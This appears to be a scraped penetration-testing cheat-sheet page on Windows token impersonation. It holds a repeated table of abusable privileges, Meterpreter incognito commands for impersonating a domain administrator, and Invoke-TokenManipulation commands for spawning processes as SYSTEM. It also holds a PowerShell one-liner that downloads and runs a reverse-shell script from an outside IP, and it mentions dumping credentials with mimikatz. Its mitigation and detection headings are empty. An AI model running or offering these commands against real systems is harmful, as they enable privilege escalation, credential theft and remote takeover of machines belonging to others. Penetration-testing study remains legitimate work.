Token Impersonation

Token impersonation is a technique through which a Windows local administrator could steal another user’s security token in order to impersonate and effectively execute commands as that user.

That are certain privileges in Windows that, if enabled, could lead to an attacker escalating privileges to SYSTEM or any other user account with an active and valid token on that system, through various tools that have been designed to specifically exploit this vulnerability.

Exploitable Privileges

Certain privileges can be exploited to either escalate privileges directly to SYSTEM or to perform actions that are normally restricted. The privileges listed below can grant direct admin access when exploited:

Privilege	Impact	Tool
SeAssignPrimaryToken	Admin	3rd party tool
SeImpersonate	Admin	3rd party tool
SeBackupPrivilege	Admin	3rd party tool
SeBackup	Threat	Built-in commands
SeCreateToken	Admin	3rd party tool
SeDebug	Admin	PowerShell
SeLoadDriver	Admin	3rd party tool
SeRestore	Admin	PowerShell
SeTakeOwnership	Admin	Built-in commands
SeTcb	Admin	3rd party tool

Privilege

Impact

Tool

SeAssignPrimaryToken

Admin

3rd party tool

SeImpersonate

Admin

3rd party tool

SeBackupPrivilege

Admin

3rd party tool

SeBackup

Threat

Built-in commands

SeCreateToken

Admin

3rd party tool

SeDebug

Admin

PowerShell

SeLoadDriver

Admin

3rd party tool

SeRestore

Admin

PowerShell

SeTakeOwnership

Admin

Built-in commands

SeTcb

Admin

3rd party tool

full list is here:

Using Metasploit

in your meterpreter shell load incognito module:

load incognito

list available tokens:

list_tokens -u

Impersonate Administrator:

impersonate_token megacorp\\administrator

Invoke-TokenManipulation

Invokes token impersonation as a domain user. If this doesn't work you can try impersonating SYSTEM and then dumping credentials using mimikatz.

Invoke-TokenManipulation -ImpersonateUser -Username "lab\domainadminuser"

Invoke-TokenManipulation -ImpersonateUser -Username "NT AUTHORITY\SYSTEM"

Get-Process wininit | Invoke-TokenManipulation -CreateProcess "cmd.exe"

As a replacement for the last command you could do, but be vary of special characters in the command like " and '

Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://10.7.253.6:82/Invoke-PowerShellTcp.ps1');\"};"

Other Techniques

Mitigation & Detection

PreviousPrivilege Escalation NextDNS Admins

Last updated 2 years ago

Privilege	Impact	Tool
SeAssignPrimaryToken	Admin	3rd party tool
SeImpersonate	Admin	3rd party tool
SeBackupPrivilege	Admin	3rd party tool
SeBackup	Threat	Built-in commands
SeCreateToken	Admin	3rd party tool
SeDebug	Admin	PowerShell
SeLoadDriver	Admin	3rd party tool
SeRestore	Admin	PowerShell
SeTakeOwnership	Admin	Built-in commands
SeTcb	Admin	3rd party tool

Privilege

Impact

Tool

SeAssignPrimaryToken

Admin

3rd party tool

SeImpersonate

Admin

3rd party tool

SeBackupPrivilege

Admin

3rd party tool

SeBackup

Threat

Built-in commands

SeCreateToken

Admin

3rd party tool

SeDebug

Admin

PowerShell

SeLoadDriver

Admin

3rd party tool

SeRestore

Admin

PowerShell

SeTakeOwnership

Admin

Built-in commands

SeTcb

Admin

3rd party tool

Invoke-TokenManipulation -ImpersonateUser -Username "lab\domainadminuser" Invoke-TokenManipulation -ImpersonateUser -Username "NT AUTHORITY\SYSTEM" Get-Process wininit | Invoke-TokenManipulation -CreateProcess "cmd.exe"

Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://10.7.253.6:82/Invoke-PowerShellTcp.ps1');\"};"